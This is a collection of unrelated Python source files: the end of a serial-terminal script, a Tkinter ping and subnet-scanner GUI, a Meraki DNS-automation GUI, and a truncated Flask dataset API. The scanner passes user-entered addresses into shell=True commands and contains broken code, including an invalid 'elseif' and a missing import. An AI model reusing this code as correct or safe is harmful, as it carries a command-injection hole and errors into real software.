miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
TK_NetworkScanning.py
|
import datetime
import re
import subprocess
import threading
from tkinter import Listbox, Menu, StringVar, Tk, messagebox, ttk
from tkinter.filedialog import askopenfilename, asksaveasfilename
import xlwt
from PIL import Image, ImageTk
TITLE_FONT = ("Helvetica", 16, "bold")
FALSE = False
function = 'function'
# images
img_IPtest = Image.open('./Images/IPtest_img.png')
img_ALL_IPimg = Image.open('./Images/ALL_IP_img.png')
img_infile = Image.open('./Images/inFile_img.png')
img_outFile = Image.open('./Images/outFile_img.png')
img_go = Image.open('./Images/go_img.png')
img_one_IPtes = Image.open('./Images/one_IPtest_img.png')
# 定义图片尺寸
IPtest_image = img_IPtest.resize((60, 60), Image.ANTIALIAS)
ALL_IPimg_image = img_ALL_IPimg.resize((60, 60), Image.ANTIALIAS)
one_IPtest_image = img_one_IPtes.resize((60, 60), Image.ANTIALIAS)
# 导入导出
infile_image = img_infile.resize((25, 25), Image.ANTIALIAS)
outFile_image = img_outFile.resize((25, 25), Image.ANTIALIAS)
go_image = img_go.resize((25, 25), Image.ANTIALIAS)
class Network_Test(Tk):
"""
MainApp
"""
def __init__(self, *args, **kwargs):
Tk.__init__(self, *args, **kwargs)
mainframe = ttk.Frame(self, padding=(3, 3, 12, 12),
borderwidth=2, relief='sunken')
self.resizable(width=False, height=False) # 禁止拉升窗口
# self.iconbitmap("./Images/app_ico.ico")
mainframe.grid(column=0, row=0, sticky="nwes")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.hig = []
for i in range(0, 18):
hi = mainframe.rowconfigure(i, weight=1)
self.hig.append(hi)
self.big = []
for j in range(0, 25):
tc = mainframe.columnconfigure(j, weight=1)
self.big.append(tc)
# self.geometry("600x300")
self.frames = {}
for F in (StartPage, Network_scan, ALL_IPtest):
page_name = F.__name__
frame = F(parent=mainframe, mainframe=self)
self.frames[page_name] = frame
frame.grid(row=0, column=0, sticky="nsew")
self.show_frame("StartPage")
def show_frame(self, page_name):
frame = self.frames[page_name]
frame.tkraise()
class StartPage(ttk.Frame):
"""
初始界面
"""
def __init__(self, parent, mainframe):
ttk.Frame.__init__(self, parent)
self.mainframe = mainframe
self.mainframe.title("网络测试(NetworkTest)")
# 菜单栏
self.mainframe.option_add('*tearOff', FALSE)
menubar = Menu(self.mainframe)
self.mainframe['menu'] = menubar
menu_tools = Menu(menubar)
menu_help = Menu(menubar)
menubar.add_cascade(menu=menu_tools, label='工具库(Tools)')
menubar.add_cascade(menu=menu_help, label='帮助(H)')
menu_tools.add_command(label='IP地址测试(IP Test)',
command=lambda: mainframe.show_frame("StartPage"))
menu_help.add_command(
label='关于(About)', command=lambda: self.About_view())
menu_tools.add_command(label='网段扫描(Network scanning)',
command=lambda: mainframe.show_frame("Network_scan"))
menu_tools.add_command(label='自定义扫描(Auto Test)',
command=lambda: mainframe.show_frame("ALL_IPtest"))
# 单个地址测试
self.one_IPtest_img = ImageTk.PhotoImage(one_IPtest_image)
self.IPtest = ttk.Label(self, text='IP地址测试',
image=self.one_IPtest_img, compound='left', font=TITLE_FONT, foreground='#1296db')
self.Ip_start = ttk.Label(self, text='输入地址:', compound='left')
self.one_iptest = StringVar()
self.one_Ip_Entry = ttk.Entry(self, textvariable=self.one_iptest)
self.one_scanning = ttk.Button(
self, text="测试", command=lambda: self.One_IPtest())
self.clear_views = ttk.Button(
self, text="清空", command=lambda: self.cleane_view())
self.Stop_test = ttk.Button(
self, text="停止", command=lambda: self.Stop_Popen())
self.choie_N = ttk.Label(self, text="选择测试次数:", compound='left')
self.view_title = ttk.Label(self, text="测试结果", compound='left')
# stop_popen
self.stop_IPtest = StringVar()
self.stop_IPtest.set('1')
# 选择ping次数
self.count_IPtest = StringVar()
self.country_one = ttk.Combobox(self, textvariable=self.count_IPtest)
self.country_one.bind('<< ComboboxSelected >>', function)
self.country_one['values'] = ('2', '3', '4', '5', '∞')
self.count_IPtest.set('4')
# 结果显示
VERTICAL = "vertical"
self.Scanning_one = Listbox(self, height=20, width=100)
self.ScanViews_one = ttk.Scrollbar(
self, orient=VERTICAL, command=self.Scanning_one.yview)
self.Scanning_one['yscrollcommand'] = self.ScanViews_one.set
ttk.Sizegrip().grid(column=2, row=4, sticky="se")
# 布局
self.IPtest.grid(column=0, row=0, sticky="nwes", padx=5, pady=5)
self.Ip_start.grid(column=1, row=1, sticky="nwes", padx=5, pady=5)
self.one_Ip_Entry.grid(column=2, row=1, sticky="nwes", padx=5, pady=5)
self.choie_N.grid(column=3, row=1, sticky="nwes", padx=5, pady=5)
self.country_one.grid(column=4, row=1, sticky="nwes", padx=5, pady=5)
self.one_scanning.grid(column=5, row=1, sticky="nwes", padx=5, pady=5)
self.view_title.grid(column=1, row=2, sticky="nwes", padx=5, pady=5)
self.ScanViews_one.grid(column=21, row=3, sticky="ns")
self.Scanning_one.grid(
column=1, row=3, sticky="nwes", columnspan=10, padx=5, pady=5)
self.Stop_test.grid(column=1, row=11, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
self.clear_views.grid(column=10, row=11, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
# 开始ping测试
def One_IPtest(self):
"""
获取IP,开始Ping测试,结果实时输出到窗口
"""
one_ip = self.one_iptest.get() # 获取IP
count_testnum = self.count_IPtest.get() # 获取测试次数
self.stop_IPtest.set('1')
if(platform.system() == 'Windows'):
if count_testnum == '∞':
add_num = "ping -t -w 600 "
else:
add_num = "ping -n {0} -w 600 ".format(count_testnum)
cmd = add_num+"{0}".format(one_ip)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
while p.poll() is None:
control = self.stop_IPtest.get()
if control == '0':
cmd_close = "taskkill /t /f /pid {0}".format(p.pid)
subprocess.Popen(cmd_close, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
break
else:
line = p.stdout.readline().strip().decode('gbk')
if line:
time_out = str(datetime.datetime.now())
test_out = time_out+':'+line
self.Scanning_one.insert('end', test_out)
self.Scanning_one.update()
elseif(platform.system() == 'Linux'):
if count_testnum == '∞':
add_num = "ping "
else:
add_num = "ping -c {0} ".format(count_testnum)
cmd = add_num+"{0}".format(one_ip)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
while p.poll() is None:
control = self.stop_IPtest.get()
if control == '0':
cmd_close = "pkill -9 {0}".format(p.pid)
subprocess.Popen(cmd_close, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
break
else:
line = p.stdout.readline().strip()
if line:
time_out = str(datetime.datetime.now())
test_out = time_out+':'+line
self.Scanning_one.insert('end', test_out)
self.Scanning_one.update()
else:
messagebox.showinfo('不支持该操作系统')
def cleane_view(self):
self.Scanning_one.delete('0', 'end')
def Stop_Popen(self):
self.stop_IPtest.set('0')
def About_view(self):
messagebox.showinfo('网络测试', """ 版本: 0.2
日期: 2019-02-05 11:30
Python: 3.7.0
源码发布于: https://github.com/ErickQian/NetworkScanning
""")
class Network_scan(ttk.Frame):
"""
网段扫描工具
"""
def __init__(self, parent, mainframe):
ttk.Frame.__init__(self, parent)
self.mainframe = mainframe
self.IPtest_img = ImageTk.PhotoImage(IPtest_image)
self.IPtest = ttk.Label(self, text='地址段扫描',
image=self.IPtest_img, compound='left', font=TITLE_FONT, foreground='#1296db')
self.Ip_start = ttk.Label(self, text='开始地址:', compound='left')
self.Ip_end = ttk.Label(self, text='结束地址:', compound='left')
self.var = StringVar()
self.Ip_Entry_s = ttk.Entry(self)
self.Ip_Entry_e = ttk.Entry(self, textvariable=self.var)
self.get_end_IP = ttk.Button(
self, text="自动", command=lambda: self.set_end_ip())
self.Do_scanning = ttk.Button(
self, text="开始扫描", command=lambda: self.start_ping())
self.choie_num = ttk.Label(self, text="选择测试次数:", compound='left')
# 选择ping次数
self.countryvar = StringVar()
self.country = ttk.Combobox(self, textvariable=self.countryvar)
self.country.bind('<< ComboboxSelected >>', function)
self.country['values'] = ('1', '2', '3', '4', '5')
self.countryvar.set('3')
# 网段地址图标
self.list_index = 0
self.label_list = []
for i in range(1, 17):
for j in range(9, 25):
self.label = ttk.Label(
self, text=self.list_index, background="#CBCBCB")
self.list_index += 1
self.label.grid(column=j, row=i, sticky="nwes", padx=5, pady=5)
self.label_list.append(self.label)
# 界面布局
self.IPtest.grid(column=0, row=0, sticky="nwes", padx=5, pady=5)
self.Ip_Entry_s.grid(column=0, row=2, sticky="nwes", padx=5, pady=5)
self.Ip_start.grid(column=0, row=1, sticky="nwes", padx=5, pady=5)
self.Ip_end.grid(column=0, row=3, sticky="nwes", padx=5, pady=5)
self.get_end_IP.grid(column=1, row=4, sticky="nwes", padx=5, pady=5)
self.Ip_Entry_e.grid(column=0, row=4, sticky="nwes", padx=5, pady=5)
self.choie_num.grid(column=0, row=5, sticky="nwes", padx=5, pady=5)
self.country.grid(column=0, row=6, sticky="nwes", padx=5, pady=5)
self.Do_scanning.grid(column=0, row=7, sticky="nwes", padx=5, pady=5)
def set_end_ip(self):
"""
填写起始地址后,默认填写结束地址为同网段最后一个地址
"""
startip = self.Ip_Entry_s.get()
pattern = r"((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))$)"
m = re.match(pattern, startip) # 检查IP地址是否合法
if m:
startip = startip.split('.')
startip[3] = '255'
endip = '.'.join(startip)
endip = self.var.set(endip)
else:
messagebox.showinfo(message='IP地址错误!\n地址只能为一个网段的IP,请检查你的输入!')
def start_ping(self):
"""
启动多线程
"""
# 检测截至IP
endip = self.var.get()
pattern = r"((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))$)"
m = re.match(pattern, endip) # 检查IP地址是否合法
if m:
end_ip_test = True
else:
end_ip_test = False
messagebox.showinfo(message='IP地址错误!\n 详细信息:\n结束地址错误,请检查你的输入!')
# 开始测试
self.reset_ui()
startip = self.Ip_Entry_s.get().split('.')
endip = self.var.get().split('.')
tmp_ip = startip
if int(startip[3]) <= int(endip[3]) and end_ip_test:
pthread_list = []
for i in range(int(startip[3]), int(endip[3]) + 1):
tmp_ip[3] = str(i)
ip = '.'.join(tmp_ip)
pthread_list.append(threading.Thread(
target=self.get_ping_result, args=(ip,)))
for item in pthread_list:
item.setDaemon(True)
item.start()
elif end_ip_test and int(startip[3]) > int(endip[3]):
messagebox.showinfo(
message='IP地址错误!\n详细信息:\n结束地址需要大于开始地址,请检查你的输入!')
def get_ping_result(self, ip):
"""
检查对应的IP是否被占用
"""
num = self.countryvar.get()
commands = "ping -n {0} -w 600".format(num)
cmd_str = commands+" {0}".format(ip)
DETACHED_PROCESS = 0x00000008 # 不创建cmd窗口
try:
subprocess.run(cmd_str, creationflags=DETACHED_PROCESS,
check=True) # 仅用于windows系统
except subprocess.CalledProcessError as err:
self.set_ui(False, ip)
else:
self.set_ui(True, ip)
def reset_ui(self):
"""
初始化窗口IP窗格为灰色背景
"""
for item in self.label_list:
item['background'] = "#CBCBCB"
def set_ui(self, result, ip):
"""
设置窗口颜色
result:线程ping的结果
ip:为对于的IP地址
"""
index = int(ip.split('.')[3])
if result:
self.label_list[index]['background'] = "#55AA7F" # 设置背景为绿色
else:
self.label_list[index]['background'] = "#FF8E77" # 设置背景为红色
class ALL_IPtest(ttk.Frame):
"""
任意IP地址扫描
扫描结显示到窗口
也可以选择导出到文本文件
"""
def __init__(self, parent, mainframe):
ttk.Frame.__init__(self, parent)
self.mainframe = mainframe
# 获取图片
self.ALLIP_img = ImageTk.PhotoImage(ALL_IPimg_image)
self.infile_img = ImageTk.PhotoImage(infile_image)
self.outFile_img = ImageTk.PhotoImage(outFile_image)
self.go_img = ImageTk.PhotoImage(go_image)
self.IPtest = ttk.Label(self, text='自定义扫描',
image=self.ALLIP_img, compound='left', font=TITLE_FONT, foreground='#1296db')
self.Get_IPtxt = ttk.Button(
self, text="导入IP文件", image=self.infile_img, compound='left', command=lambda: self.start_ping()())
self.Go_Scanning = ttk.Button(
self, text="开始扫描", image=self.go_img, compound='left')
self.Out_ScanningTxt = ttk.Button(
self, text="导出结果", image=self.outFile_img, compound='left', command=lambda: self.save_view())
self.Clean_ScanningTxt = ttk.Button(
self, text="清空", command=lambda: self.cleane_view())
self.TestView = ttk.Label(
self, text='扫描结果:', font=TITLE_FONT, foreground='#1296db')
self.ping_test = []
# 结果显示
VERTICAL = "vertical"
self.Scanning_L = Listbox(self, height=20, width=100)
self.ScanViews = ttk.Scrollbar(
self, orient=VERTICAL, command=self.Scanning_L.yview)
self.Scanning_L['yscrollcommand'] = self.ScanViews.set
ttk.Sizegrip().grid(column=2, row=4, sticky="se")
self.ScanViews.grid(column=21, row=3, sticky="ns")
self.Scanning_L.grid(column=1, row=3, sticky="nwes",
columnspan=20, padx=5, pady=5)
self.IPtest.grid(column=0, row=0, sticky="nwes", padx=5, pady=5)
self.Get_IPtxt.grid(column=1, row=1, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
self.Go_Scanning.grid(column=2, row=1, sticky="nwes",
columnspan=1, rowspan=1, padx=5, pady=5)
self.Out_ScanningTxt.grid(
column=20, row=20, sticky="nwes", columnspan=1, rowspan=1, padx=5, pady=5)
self.Clean_ScanningTxt.grid(
column=1, row=20, sticky="nwes", columnspan=1, rowspan=1, padx=5, pady=5)
self.TestView.grid(column=1, row=2, sticky="nwes", padx=5, pady=5)
# 获取IP
def check_file(self):
"""
askopenfilename获取IP地址文件
"""
self.open_filename = askopenfilename(
title='打开文件', filetypes=[('All Files', '*')])
with open(self.open_filename, 'r') as f:
self.startip = f.readlines()
return(self.startip)
# 处理IP
def start_ping(self):
"""
启动多线程
检查IP地址合法性
"""
get_ALLip = self.check_file()
pthread_list = []
self.Scanning_L.insert(
'end', '时间 IP地址 测试次数 通信状态')
for line in get_ALLip:
if len(line.strip()):
ip = line.strip('\n')
# 开始测试
pthread_list.append(threading.Thread(
target=self.get_ping_result, args=(ip,)))
for item in pthread_list:
item.setDaemon(True)
item.start()
self.ping_test = [['时间', 'IP地址', 'Ping次数', '通信情况']]
def get_ping_result(self, ip):
"""
检查对应的IP是否被占用
"""
cmd_str = "ping {0} -n 4 -w 600".format(ip)
DETACHED_PROCESS = 0x00000008 # 不创建cmd窗口
time_now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
try:
subprocess.run(cmd_str, creationflags=DETACHED_PROCESS,
check=True) # 仅用于windows系统
except subprocess.CalledProcessError as err:
self.Scanning_L.insert(
'end', '%s %s 4 通信失败' % (str(time_now), ip))
self.ping_test.append([time_now, ip, 4, '通信失败'])
else:
self.ping_test.append([time_now, ip, 4, '通信正常'])
self.Scanning_L.insert(
'end', '%s %s 4 通信正常' % (str(time_now), ip))
self.Scanning_L.update()
def cleane_view(self):
self.Scanning_L.delete('0', 'end')
def save_view(self):
PingTest = xlwt.Workbook() # 新建一个excel
sheet = PingTest.add_sheet('Ping测试数据结果') # 添加一个sheet页
row = 0 # 控制行
for stu in self.ping_test:
col = 0 # 控制列
for s in stu: # 再循环里面list的值,每一列
sheet.write(row, col, s)
col += 1
row += 1
PingTest.save('Ping测试数据结果.xls') # 保存到当前目录下
messagebox.showinfo('提示', '数据已导出到程序可执行文件目录下的(Ping测试数据结果.xls)文件中!')
if __name__ == "__main__":
app = Network_Test()
app.mainloop()
|
pages.py
|
import threading
import tkinter as tk
from tkinter import *
from tkinter import ttk
import ipaddress
import automation.automation_core
class StartPage(tk.Frame):
"""
The application starts by asking you to provide your api key, checks it and set it to the AutomationCore Application
variable, and then redirects you to the Organization Page
"""
invalid_api_key = None
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting my_tkinter_interface controller
self.controller = controller
# Project name
self.label_title = tk.Label(self, text='Welcome to Meraki-automation-dns', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking for Dashboard API key
self.label_instruction = tk.Label(self, text='Please enter your Meraki Dashboard API key to start :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# Api key input
api_key_input = Entry(self, font=("Helvetica", 12), text='')
api_key_input.pack()
# validate api key button
validate_api_key_button = Button(self, text="Validate", font=("Helvetica", 12), bg='white', fg='#3a995b',
command=lambda: self.validate_api_key(api_key=api_key_input.get(),
controller=controller))
validate_api_key_button.pack(pady=10)
# Error message if the API Key is invalid
self.invalid_api_key = tk.Label(self, text='Your Meraki Dashboard API key is invalid, please retry',
font=('Roboto', 18), bg='#3a995b',
fg='red')
def validate_api_key(self, api_key: str, controller):
"""
This checks if the API is right by using automation class method 'set_working_api_key'.
If the key is invalid, it packs the invalid_api_key label corresponding to an error message.
If the key is valid, it initializes the 'automation' variable with the API key,
but also initializes the combobox for the Organization Page
It then switch to the Organization Page
:param api_key: str
:param controller:
:return:
"""
# Checks if the provided API key is correct & sets it
if controller.automation.set_working_api_key(api_key=api_key):
# If the error message for wrong API key is up, cleans it
if self.invalid_api_key.winfo_ismapped():
self.invalid_api_key.pack_forget()
# Sets the combobox for the next page
page = self.controller.get_page('OrganizationPage')
page.init_combo_box_after_valid_api_key()
# Switch to the Organization page
controller.show_frame("OrganizationPage")
# If the API key is incorrect
else:
# Displays the API key error message if not already displayed
if not self.invalid_api_key.winfo_ismapped():
self.invalid_api_key.pack()
class OrganizationPage(tk.Frame):
"""
This page ask your which Organization you want to work with.
"""
# ComboBox containing the different organizations user has access to
# It will be initialized in the 'init_combo_box_after_valid_api_key' function
combobox = None
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting my_tkinter_interface controller
self.controller = controller
# Organization page
self.label_title = tk.Label(self, text='Organization choice', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking to choose the Organization
self.label_instruction = tk.Label(self, text='Please choose your working Organization :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# validate organization button
self.validate_organization_button = Button(self, text="Validate", font=("Helvetica", 12), bg='white',
fg='#3a995b',
command=lambda: self.validate_organization(self.combobox.get()))
self.validate_organization_button.pack(pady=10)
def init_combo_box_after_valid_api_key(self):
"""
Initializes the comboBox containing the user accessible organizations
:return:
"""
self.combobox = ttk.Combobox(self, values=self.controller.automation.get_available_organizations_names_list(),
width=40)
# Display first element of the list
self.combobox.current(0)
self.combobox.pack()
def validate_organization(self, organization_name):
"""
Sets the working organization and then switch to the Network Page
:param organization_name:
:return:
"""
# Sets the working organization with the organization name
self.controller.automation.set_working_organization(organization_name=organization_name)
# Initializes the Network page ComboBox variable
page = self.controller.get_page('NetworkPage')
page.init_combo_box_after_valid_organization()
# Shows the Network Page
self.controller.show_frame("NetworkPage")
class NetworkPage(tk.Frame):
"""
This page ask you which network you want to work with
"""
# ComboBox containing the different organizations user has access to
# It will be initialized in the 'init_combo_box_after_valid_organization' function
combobox = None
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting the frame controller
self.controller = controller
# Network page
self.label_title = tk.Label(self, text='Network choice', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking to choose the Network
self.label_instruction = tk.Label(self, text='Please choose your working Network :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# validate network button
self.validate_network_button = Button(self, text="Validate", font=("Helvetica", 12), bg='white', fg='#3a995b',
command=lambda: self.validate_network(self.combobox.get()))
self.validate_network_button.pack(pady=10)
def init_combo_box_after_valid_organization(self):
"""
Initializes the comboBox containing the user accessible networks
:return:
"""
self.combobox = ttk.Combobox(self, values=self.controller.automation.get_available_networks_names_list(),
width=40)
# Display first element of the list
self.combobox.current(0)
self.combobox.pack()
def validate_network(self, network_name):
"""
Sets the working network and then switch to the Template Page
:param network_name:
:return:
"""
# Sets the working network with the network name
self.controller.automation.set_working_network(network_name=network_name)
# Shows the Template Page
self.controller.show_frame("DnsPage")
class DnsPage(tk.Frame):
"""
This page makes you choose two DNS IP to modify an entire network device static DNS configuration.
"""
def __init__(self, parent, controller):
tk.Frame.__init__(self, parent)
# Setting background color
self.config(background='#3a995b')
# Setting the frame controller
self.controller = controller
# DNS page
self.label_title = tk.Label(self, text='DNS modification', font=('Roboto', 32), bg='#3a995b',
fg='white')
self.label_title.pack()
# Asking to choose the DNS configuration
self.label_instruction = tk.Label(self, text='Please input two DNS IP :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
self.label_instruction.pack()
# DNS 1 label
dns_one_label = Label(self, text='DNS 1 :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
dns_one_label.pack()
# DNS 1 input
dns_one_input = Entry(self, font=("Helvetica", 12))
dns_one_input.pack()
# DNS 2 label
dns_two_label = Label(self, text='DNS 2 :',
font=('Roboto', 16),
bg='#3a995b', fg='white')
dns_two_label.pack()
# DNS 2
dns_two_input = Entry(self, font=("Helvetica", 12))
dns_two_input.pack()
# Validate DNS button
# Here we use for the button's command a different thread, so the frame doesn't freezes when the automation runs
self.validate_dns_button = tk.Button(self, text="Validate DNS and launch automation",
font=("Helvetica", 12),
bg='white',
fg='#3a995b',
command=lambda:
threading.Thread(target=self.validate_dns(dns_one_ip=dns_one_input.get(),
dns_two_ip=dns_two_input.get()))
.start()
)
self.validate_dns_button.pack(pady=10)
# Error message if DNS 1 isn't valid
self.dns_one_invalid = tk.Label(self, text='First DNS is not valid, please correct it',
font=('Roboto', 14), bg='#3a995b',
fg='red')
# Error message if DNS 2 isn't valid
self.dns_two_invalid = tk.Label(self, text='Second DNS is not valid, please correct it',
font=('Roboto', 14), bg='#3a995b',
fg='red')
# Validation message when both DNS are ok
self.dns_both_valid = tk.Label(self, text='Both DNS are valid, automation started !',
font=('Roboto', 14), bg='#3a995b',
fg='white')
# Work in progress label
self.label_work_in_progress = tk.Label(self, text='Work in progress...',
font=('Roboto', 14),
bg='#3a995b', fg='white')
# Done label
self.label_done = tk.Label(self, text='Done ! Automation complete',
font=('Roboto', 20),
bg='#3a995b', fg='white')
def validate_dns(self, dns_one_ip, dns_two_ip):
"""
Checks if the DNS provided by the user are OK and then launches the automation.
:param dns_one_ip:
:param dns_two_ip:
:return:
"""
# Clears previous messages
self.dns_one_invalid.pack_forget()
self.dns_two_invalid.pack_forget()
self.dns_both_valid.pack_forget()
self.label_work_in_progress.pack_forget()
self.label_done.pack_forget()
# Checks if DNS IP are correct
dns_one_valid = automation.automation_core.check_ip_validity(ip=dns_one_ip)
dns_two_valid = automation.automation_core.check_ip_validity(ip=dns_two_ip)
# If both DNS are OK
if dns_one_valid and dns_two_valid:
# Displays the validation message of both DNS
self.dns_both_valid.pack()
# Displays Work in progress label
self.label_work_in_progress.pack()
# Starts the automation
self.controller.automation.update_network_static_devices_dns(dns_list=[dns_one_ip, dns_two_ip])
# Displays the done message
self.label_done.pack()
# If DNS 1 is invalid
elif not dns_one_valid:
# Displays the DNS 1 error message
self.dns_one_invalid.pack()
# If DNS 2 is also invalid
if not dns_two_valid:
# Displays the DNS 2 error message
self.dns_two_invalid.pack()
# If only DNS 2 is invalid
elif not dns_two_valid:
# Displays the DNS 2 error message
self.dns_two_invalid.pack()
|
app.py
|
#!/usr/bin/env python3
import json
import os
import pickle
import sys
import re
import uuid
from psutil import Process as ProcessManager
from psutil import NoSuchProcess
from flask import Flask, make_response, Response, jsonify, request, send_file, send_from_directory
from data_access.Dataset import GeneyDataset
from multiprocessing import Process
from data_access import GeneyJob
import smtplib
from private import EMAIL_PASS, EMAIL_USER
from email.message import EmailMessage
DATA_PATH = os.getenv('GENEY_DATA_PATH', '')
if not DATA_PATH:
print('"GENEY_DATA_PATH" environment variable not set!', flush=True)
sys.exit(1)
URL = os.getenv('GENEY_URL', '')
if not URL:
print('"GENEY_URL" environment variable not set!', flush=True)
sys.exit(1)
DOWNLOAD_LOCATION = os.getenv('DOWNLOAD_LOCATION', '')
if not DOWNLOAD_LOCATION:
print('"DOWNLOAD_LOCATION" environment variable not set!', flush=True)
sys.exit(1)
else:
DOWNLOAD_HISTORY = os.path.join(DOWNLOAD_LOCATION, 'download_history.pkl')
with open(DOWNLOAD_HISTORY, 'wb') as fp:
pickle.dump({}, fp)
MIME_TYPES = {
'csv': 'text/csv',
'json': 'application/json',
'tsv': 'text/tsv',
'gz': 'application/gzip',
'html': 'text/html',
'xlsx': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'pq': 'application/parquet',
'feather': 'application/feather',
'pkl': 'application/pickle',
'msgpack': 'application/msgpack',
'dta': 'application/stata',
'arff': 'application/arff',
'sql': 'application/sqlite',
'h5': 'application/hdf5',
'gzip': 'application/gzip',
}
# dictionary of commands and their respective handlers
# each command function registers itself in this dictionary after it is defined
COMMANDS = {}
# cache of datasets so we don't have to go to redis everytime we need a dataset
# if you make a change to a dataset and want it to reload, you'll need to restart the server
# we do not assume this is a comprehansive list of all datasets, for that we rely on redis
DATASETS = {}
DESCRIPTIONS = None
DATASETS_LOADED: bool = False
app = Flask(__name__)
def load_datasets() -> None:
global DATASETS_LOADED
global DESCRIPTIONS
DESCRIPTIONS = {}
for directory in os.listdir(DATA_PATH):
if os.path.isdir(os.path.join(DATA_PATH, directory)):
try:
dataset = GeneyDataset(os.path.join(DATA_PATH, directory))
DATASETS[dataset.dataset_id] = dataset
DESCRIPTIONS[dataset.dataset_id] = dataset.description
# redis_con.set('dataset_' + directory, pickle.dumps(dataset))
except Exception as e:
sys.stderr.write(str(e))
sys.stderr.write('UNABLE TO LOAD DATASET "{}"'.format(directory))
DATASETS_LOADED = True
def get_dataset(dataset_id: str) -> GeneyDataset:
try:
if not DATASETS_LOADED:
load_datasets()
return get_dataset(dataset_id)
if dataset_id in DATASETS:
return DATASETS[dataset_id]
else:
return None
except Exception:
return None
@app.route('/api', strict_slashes=False, methods=['POST'])
def geney_command():
# TODO: add authorization to commands
params = request.get_json()
if 'command' not in params:
return bad_request()
command = params['command']
if command not in COMMANDS:
return bad_request()
return COMMANDS[command](params)
@app.route('/api/datasets', strict_slashes=False, methods=['GET'])
def get_datasets():
if not DATASETS_LOADED:
load_datasets()
if DESCRIPTIONS is not None:
return Response(json.dumps(DESCRIPTIONS), mimetype='application/json')
else:
return not_found()
@app.route('/api/datasets/<string:dataset_id>/groups', strict_slashes=False)
def get_groups(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
return jsonify(dataset.get_groups())
@app.route('/api/datasets/<string:dataset_id>/groups/<string:group_name>/search', strict_slashes=False)
@app.route('/api/datasets/<string:dataset_id>/groups/<string:group_name>/search/<string:search_str>',
strict_slashes=False)
def search_group(dataset_id, group_name, search_str=None):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
return jsonify(dataset.search_group(group_name, search_str))
@app.route('/api/datasets/<string:dataset_id>/options', strict_slashes=False)
@app.route('/api/datasets/<string:dataset_id>/options/<string:variable_name>', strict_slashes=False)
def get_options(dataset_id, variable_name=None):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
if variable_name:
results = dataset.get_variable(variable_name)
return jsonify(results)
else:
return send_file(dataset.options_path)
@app.route('/api/datasets/<string:dataset_id>/options/<string:variable_name>/search', strict_slashes=False)
@app.route('/api/datasets/<string:dataset_id>/options/<string:variable_name>/search/<string:search_str>',
strict_slashes=False)
def search_options(dataset_id, variable_name, search_str=None):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
else:
return jsonify(dataset.search_options(variable_name, search_str))
@app.route('/api/datasets/<string:dataset_id>/samples', strict_slashes=False, methods=['POST'])
def count_samples(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
count = dataset.get_num_samples_matching_filters(request.data)
if count is None:
return bad_request()
return jsonify(count)
@app.route('/api/datasets/<string:dataset_id>/num_points', strict_slashes=False, methods=['POST'])
def num_points(dataset_id):
dataset = get_dataset(dataset_id)
if dataset is None:
return not_found()
params = request.get_json()
groups = params['groups']
features = params['features']
samples = params['num_samples']
return jsonify({'num_data_points': dataset.get_num_data_points(samples, groups, features)})
@app.route('/api/data/status/<string:path>', strict_slashes=False, methods=['GET'])
def download(path):
file_type = path.split('.')[-1]
if file_type == 'gz':
file_type = path.split('.')[-2]
path = os.path.join(DOWNLOAD_LOCATION, path)
if os.path.exists(path):
return jsonify({'url': '/api/data/download/{}'.format(path.split('/')[-1])})
else:
return jsonify({'status': 'incomplete'})
@app.route('/api/data/download/<string:path>', strict_slashes=False, methods=['GET'])
def get(path):
file_type = path.split('.')[-1]
if file_type == 'gz':
file_type = path.split('.')[-2]
mime_type = MIME_TYPES[file_type]
extension = re.search(r'\..*', path).group(0)
full_path = os.path.join(DOWNLOAD_LOCATION, path)
if os.path.exists(full_path):
# return send_file(full_path, mimetype=mime_type, as_attachment=True,
